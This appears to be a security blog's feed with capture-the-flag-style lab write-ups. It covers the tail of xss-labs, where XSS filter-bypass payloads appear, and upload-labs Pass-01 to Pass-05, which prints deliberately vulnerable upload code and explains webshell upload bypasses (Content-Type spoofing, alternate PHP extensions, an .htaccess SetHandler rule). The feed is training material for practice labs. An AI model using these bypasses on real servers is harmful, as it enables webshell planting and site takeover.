class="line">src=level1.php?name=1'window.alert()</span><br></pre></td></tr></table></figure><h3 id="第15关"><a href="#第15关" class="headerlink" title="第15关"></a>Level 15</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = strtolower($_GET[<span class="string">"keyword"</span>]);</span><br><span class="line">$str2=str_replace(<span class="string">"script"</span>,<span class="string">"&nbsp;"</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">" "</span>,<span class="string">"&nbsp;"</span>,$str2);</span><br><span class="line">$str4=str_replace(<span class="string">"/"</span>,<span class="string">"&nbsp;"</span>,$str3);</span><br><span class="line">$str5=str_replace(<span class="string">""</span>,<span class="string">"&nbsp;"</span>,$str4);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<center>"</span>.$str5.<span class="string">"</center>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Spaces, slashes and the word script are replaced, so consider an encoding bypass (%0d stands in for the space):</p><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">keyword=<img%<span class="number">0</span>dsrc=<span class="number">1</span>%<span class="number">0</span>donerror=alert()></span><br></pre></td></tr></table></figure><p>Done!</p><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"> ,ad8888ba, <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> </span><br><span class="line"> d8<span class="string">"' `"</span><span class="number">8</span>b <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> </span><br><span class="line">d8' <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> </span><br><span class="line"><span class="number">88</span> ,adPPYba, ,adPPYba, ,adPPYb,<span class="number">88</span> <span class="number">88</span> ,adPPYba, <span class="number">88</span>,dPPYba, <span class="number">88</span> </span><br><span class="line"><span class="number">88</span> <span class="number">88888</span> a8<span class="string">" "</span><span class="number">8</span>a a8<span class="string">" "</span><span class="number">8</span>a a8<span class="string">" `Y88 88 a8"</span> <span class="string">"8a 88P' "</span><span class="number">8</span>a <span class="number">88</span> </span><br><span class="line">Y8, <span class="number">88</span> <span class="number">8</span>b d8 <span class="number">8</span>b d8 <span class="number">8</span>b <span class="number">88</span> <span class="number">88</span> <span class="number">8</span>b d8 <span class="number">88</span> d8 <span class="string">""</span> </span><br><span class="line"> Y8a. 
.a88 <span class="string">"8a, ,a8"</span> <span class="string">"8a, ,a8"</span> <span class="string">"8a, ,d88 88, ,d88 "</span><span class="number">8</span>a, ,a8<span class="string">" 88b, ,a8"</span> aa </span><br><span class="line"> `<span class="string">"Y88888P"</span> `<span class="string">"YbbdP"</span>' `<span class="string">"YbbdP"</span>' `<span class="string">"8bbdP"</span>Y8 <span class="string">"Y8888P"</span> `<span class="string">"YbbdP"</span>' <span class="number">8</span>Y<span class="string">"Ybbd8"</span>' <span class="number">88</span></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<h3 id="第1关"><a href="#第1关" class="headerlink" title="第1关"></a>Level 1</h3><p>The input variable is output directly;</p>
<p>Try:</p>
<figure class="highlight js"><table><tr>
</summary>
<category term="XSS" scheme="https://singlemindedt.github.io/tags/XSS/"/>
</entry>
<entry>
<title>File Inclusion Vulnerabilities</title>
<link href="https://singlemindedt.github.io/2020/08/04/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E-1/"/>
<id>https://singlemindedt.github.io/2020/08/04/文件包含漏洞-1/</id>
<published>2020-08-04T01:27:35.000Z</published>
<updated>2020-08-04T01:29:57.191Z</updated>
<content type="html"><![CDATA[<p><a href="https://www.jianshu.com/p/3514f0fd79f7" target="_blank" rel="noopener">Summary of file inclusion vulnerability study</a></p>]]></content>
<summary type="html">
<p><a href="https://www.jianshu.com/p/3514f0fd79f7" target="_blank" rel="noopener">Summary of file inclusion vulnerability study</a></p>
</summary>
</entry>
<entry>
<title>Upload-labs Notes</title>
<link href="https://singlemindedt.github.io/2020/08/03/Upload-labs%E8%AE%B0%E5%BD%95/"/>
<id>https://singlemindedt.github.io/2020/08/03/Upload-labs记录/</id>
<published>2020-08-03T03:42:09.000Z</published>
<updated>2020-08-03T12:48:09.328Z</updated>
<content type="html"><![CDATA[<p><img src="https://s1.ax1x.com/2020/05/02/JvJadS.png" alt="JvJadS.png"></p><p><img src="https://s1.ax1x.com/2020/05/02/JvJYsP.png" alt="JvJYsP.png"></p><p>+++</p><h2 id="Pass-01"><a href="#Pass-01" class="headerlink" title="Pass-01"></a>Pass-01</h2><p><img src="https://s1.ax1x.com/2020/05/02/JvJJMt.png" alt="JvJJMt.png"></p><p>As shown, the task is to upload a webshell to the server, while the form only accepts images;</p><p>First, try uploading an arbitrary file:</p><p><img src="https://s1.ax1x.com/2020/05/02/JvJ8xI.png" alt="JvJ8xI.png"></p><p>We are told that <strong>only .jpg|.png|.gif files may be uploaded</strong>;</p><p>The hint reads: “This pass checks for invalid images on the client side using JS!”;</p><p>The hint is explicit: this level filters disallowed extensions with client-side JS only, so we just rename the file to an allowed extension before uploading, capture the request, and edit it;</p><p>Let's look at the source:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">function <span class="title">checkFile</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">var</span> file = document.getElementsByName(<span class="string">'upload_file'</span>)[<span class="number">0</span>].value;</span><br><span class="line"> <span class="keyword">if</span> (file == <span class="keyword">null</span> || file == <span class="string">""</span>) {</span><br><span class="line"> alert(<span class="string">"请选择要上传的文件!"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line"> 
<span class="comment">//define the allowed upload file types</span></span><br><span class="line"> <span class="keyword">var</span> allow_ext = <span class="string">".jpg|.png|.gif"</span>;</span><br><span class="line"> <span class="comment">//extract the uploaded file's extension</span></span><br><span class="line"> <span class="keyword">var</span> ext_name = file.substring(file.lastIndexOf(<span class="string">"."</span>));</span><br><span class="line"> <span class="comment">//check whether this file type is allowed</span></span><br><span class="line"> <span class="keyword">if</span> (allow_ext.indexOf(ext_name + <span class="string">"|"</span>) == -<span class="number">1</span>) {</span><br><span class="line"> <span class="keyword">var</span> errMsg = <span class="string">"该文件不允许上传,请上传"</span> + allow_ext + <span class="string">"类型的文件,当前文件类型为:"</span> + ext_name;</span><br><span class="line"> alert(errMsg);</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><ul><li>Filtering method: <strong>client-side JS whitelist check</strong>; whether the upload is allowed is decided solely by whether the file extension is .jpg|.png|.gif;</li><li>Bypass: disguise the webshell as a .jpg|.png|.gif file, intercept the upload request in Burp, change the extension to .php, and forward it.</li></ul><p><img src="https://s1.ax1x.com/2020/05/02/JvJdIg.png" alt="JvJdIg.png"></p><p>Modify the request:</p><p><img src="https://s1.ax1x.com/2020/05/02/JvJtqf.png" alt="JvJtqf.png"></p><p><strong>Other methods:</strong></p><ol><li><p>Modify the JS script</p></li><li><p>Disable JS in the browser (Firefox 🦊)</p><ul><li>Enter “about:config” in the Firefox address bar. Type “javascript.enabled” in the search box to find the preference. Right-click, choose “Toggle”, and set “javascript.enabled” to “false”</li></ul></li></ol><p>+++</p><h2 id="Pass-02"><a href="#Pass-02" class="headerlink" title="Pass-02"></a>Pass-02</h2><p>First, try uploading a PHP file; the message is: <strong>文件类型不正确,请重新上传!</strong> (incorrect file type, please upload again). This time it is neither an extension whitelist nor a blacklist: we are told the file type is wrong, so it should be a MIME check.</p><p>Check the hint:</p><blockquote><p>Hint: this pass checks the MIME type of the request on the server side!</p></blockquote><p><strong>Supplement:</strong><br>MIME(Multipurpose Internet Mail 
Extensions) is the standard that maps a file extension to the application used to open it; when a file with that extension is accessed, the browser automatically opens it with the designated application. It is mostly used to specify some client-defined file names and how some media files are opened.</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">Common MIME types (general):</span><br><span class="line">HTML text .html text/html</span><br><span class="line">XML document .xml text/xml</span><br><span class="line">XHTML document .xhtml application/xhtml+xml</span><br><span class="line">Plain text .txt text/plain</span><br><span class="line">RTF text .rtf application/rtf</span><br><span class="line">PDF document .pdf application/pdf</span><br><span class="line">Microsoft Word file .word application/msword</span><br><span class="line">PNG image .png image/png</span><br><span class="line">GIF image .gif image/gif</span><br><span class="line">JPEG image .jpeg,.jpg image/jpeg</span><br><span class="line">AU audio file .au audio/basic</span><br><span class="line">MIDI music file mid,.midi audio/midi,audio/x-midi</span><br><span class="line">RealAudio music file .ra, .ram audio/x-pn-realaudio</span><br><span class="line">MPEG file .mpg,.mpeg video/mpeg</span><br><span class="line">AVI file .avi video/x-msvideo</span><br><span class="line">GZIP file .gz application/x-gzip</span><br><span class="line">TAR file .tar application/x-tar</span><br><span class="line">Arbitrary binary data application/octet-stream</span><br></pre></td></tr></table></figure><p>+++</p><p>Source:</p><figure class="highlight 
php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="keyword">if</span> (($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/jpeg'</span>) || ($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/png'</span>) || ($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/gif'</span>)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH . <span class="string">'/'</span> . 
$_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'文件类型不正确,请重新上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH.<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><ul><li><p>Filtering method: <strong>server-side whitelist</strong>; the file's MIME type (Multipurpose Internet Mail Extensions) is validated and only image types pass, but the type checked is the client-supplied Content-Type of the multipart part, not the file content</p></li><li><p>Bypass:</p><ol><li><p>Upload an image file containing the webshell, intercept it in Burp, and change the extension to .php</p></li><li><p>Upload the webshell file directly, intercept it in Burp, and change the Content-Type to an allowed type such as image/png</p></li></ol></li></ul><p>+++</p><p> Here we use method 2 and change the Content-Type to image/png:<br>Capture:</p><p><img src="https://s1.ax1x.com/2020/05/02/JvJUZ8.png" alt="JvJUZ8.png"></p><p>Modify:</p><p><img src="https://s1.ax1x.com/2020/05/02/JvRDfA.png" alt="JvRDfA.png"></p><p>Send:<br>The upload succeeds, and the file can be accessed by opening it directly;</p><p><img src="https://s1.ax1x.com/2020/05/02/JvWp11.png" alt="JvWp11.png"></p><p>+++</p><h2 id="Psaa-03"><a href="#Psaa-03" class="headerlink" title="Psaa-03"></a>Pass-03</h2><p>First, try uploading a PHP file; the message is: <strong>提示:不允许上传.asp,.aspx,.php,.jsp后缀文件!</strong> (files with the .asp, .aspx, .php or .jsp extension are not allowed)</p><p>Check the hint:</p><blockquote><p>This pass forbids uploading files with the .asp|.aspx|.php|.jsp extension!</p></blockquote><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">'.asp'</span>,<span class="string">'.aspx'</span>,<span class="string">'.php'</span>,<span class="string">'.jsp'</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//strip trailing dots from the file name</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//convert to lowercase</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//remove the string ::$DATA</span></span><br><span class="line"> $file_ext = 
trim($file_ext); <span class="comment">//trim leading and trailing whitespace</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file,$img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'不允许上传.asp,.aspx,.php,.jsp后缀文件!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . 
<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><ul><li><p>Filtering method: <strong>server-side blacklist validation</strong>; (uploading files with the .asp|.aspx|.php|.jsp extension is forbidden)</p></li><li><p>Bypass:<br>(1) Upload an extension the server still parses as PHP, such as .php3 .phtml .phps .php5 .pht…<br>(2) Override the file parsing rules: first upload a .htaccess file, then upload a hack.png file (containing the webshell)<br>The .htaccess file makes the PHP handler parse any file whose name contains the string ”hack.png”, whatever its extension (or none), as PHP<br>.htaccess content:</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="section"><FilesMatch "hack.png"></span></span><br><span class="line"><span class="attribute"><span class="nomarkup">SetHandler</span></span> application/x-httpd-php</span><br><span class="line"><span class="section"></FilesMatch></span></span><br></pre></td></tr></table></figure></li></ul><blockquote><p>application/x-httpd-php is a MIME type</p></blockquote><p>Here the file extension is changed to .php3;</p><p><img src="https://s1.ax1x.com/2020/05/02/JvR66P.png" alt="JvR66P.png"></p><p>Upload succeeded!<br>+++</p><h2 id="Pass-04"><a href="#Pass-04" class="headerlink" title="Pass-04"></a>Pass-04</h2><p>First, try uploading a PHP file; the message is: <strong>提示:此文件不允许上传!</strong> (this file is not allowed) </p><p>Check the hint:</p><blockquote><p>This pass forbids uploading files with the .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf extension!</p></blockquote><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">"php1"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">"pHp1"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span 
class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//strip trailing dots from the file name</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//convert to lowercase</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//remove the string ::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//trim leading and trailing whitespace</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span 
class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><ul><li><p>拦截方式:<strong>服务端黑名单加强验证</strong>;与Pass-03类似,只是对上传文件的后缀名的限制种类增加</p></li><li><p>绕过方式:重写文件解析规则绕过(第3关(2))</p><ol><li>上传<code>.htaccess文件</code></li></ol><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="section"><FilesMatch "hack.png"></span></span><br><span class="line"><span class="attribute"><span class="nomarkup">SetHandler</span></span> application/x-httpd-php</span><br><span class="line"><span class="section"></FilesMatch></span></span><br></pre></td></tr></table></figure><ol start="2"><li>上传hack.png(含木马)</li></ol></li></ul><p><img src="https://s1.ax1x.com/2020/05/02/JvRBYd.png" alt="JvRBYd.png"></p><p>上传成功,并以php进行了解析!</p><p>+++</p><h2 id="Pass-05"><a href="#Pass-05" class="headerlink" title="Pass-05"></a>Pass-05</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:此文件类型不允许上传! 
*</em></p><p>查看提示:</p><blockquote><p>本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess后缀文件!</p></blockquote><p>Pass-05向黑名单中增加了<code>.htaccess</code>后缀文件;</p><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span 
class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = 
str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//首尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . 
